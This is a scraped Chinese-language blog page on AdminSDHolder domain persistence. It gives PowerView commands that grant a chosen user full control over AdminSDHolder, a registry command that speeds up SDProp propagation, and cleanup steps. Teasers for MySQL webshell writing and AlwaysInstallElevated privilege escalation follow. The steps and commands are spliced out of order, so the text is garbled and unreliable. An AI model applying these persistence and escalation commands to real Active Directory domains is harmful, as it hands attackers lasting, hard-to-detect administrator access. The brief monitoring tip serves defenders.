adminsdholder可以理解成是域內很多個組的集合體,如果乙個使用者能完全控制adminsdholder,那麼它就能同時控制域內的許多組,adminsdholder內部的組如下:
administrators假設有這麼一種情況,我們先獲得了域內zhangsan使用者的許可權,然後得到了域控的許可權,現在需要對域控的許可權進行許可權維持。domain admins
account operators
backup operators
domain controllers
enterprise admins
print operators
replicator
read-only domain controllers
schema admins
server operators
首先匯入powerview
1.在域控上執行如下命令,使得zhangsan可以對adminsdholder完全控制。
add-domainobjectacl -targetidentity adminsdholder -principalidentity zhangsan -rights allget-domainobjectacl adminsdholder | ? | select objectdn,activedirectoryrights |sort -unique也可以通過圖形戶頁面來驗證,在域控上執行視窗中輸入adsiedit.msc:
3.由於配置完成後90分鐘才能更新設定,我們可以通過更改登錄檔的方式設定成60秒後觸發,實戰中建議不要改:
reg add hklm\system\currentcontrolset\services\ntds\parameters /v adminsdprotectfrequency /t reg_dword /d 1 /f登陸到zhangsan的賬戶上後,可以直接將zhangsan加入到管理員組5.將觸發時間恢復到120
6.將zhangsan 對於adminsdholder的許可權取消:reg add hklm\system\currentcontrolset\services\ntds\parameters /v adminsdprotectfrequency /t reg_dword /d 120 /f7.驗證刪除結果remove-domainobjectacl -targetsearchbase "ldap://cn=adminsdholder,cn=system,dc=test,dc=com" -principalidentity zhangsan -rights all -verbose若無回顯,則許可權去除成功。
1.實時監控adminsdholder的許可權更改情況。get-domainobjectacl adminsdholder | ? | select objectdn,activedirectoryrights |sort -unique域滲透——adminsdholder
mysql 利用 mysql利用
mysql 寫入webshell復現 1.直接寫入 windows成功率較高 1.檢視是否允許可寫 空可寫,null不行,5.5以前預設為空,5.5以後預設為null 2.寫入檔案 2.日誌檔案寫入shell 5.0以後會建立日誌檔案 資料庫許可權 1.檢視是否開啟日誌 2.開啟日誌 3.設定路徑 ...
利用AlwaysInstallElevated提權
2.啟用alwaysinstallelevated 3.提權 4.防禦方式 5.參考文章 alwaysinstallelevated是登錄檔的乙個鍵值,當其值為1的時候,普通使用者即可以system許可權安裝msi程式。certutil.exe urlcache split f開啟powershel...
鉤子的利用
在 ae 開發中,可以利用鉤子把 mapcontrol 給傳到由 itool 或者icommond 繼承的命令或者工具裡,傳進去的鉤子就是 hook 型別是乙個 object 實際上就是乙個 mapcontrol 可以用強制轉換為 mapcontrol icommand gtcstandard if...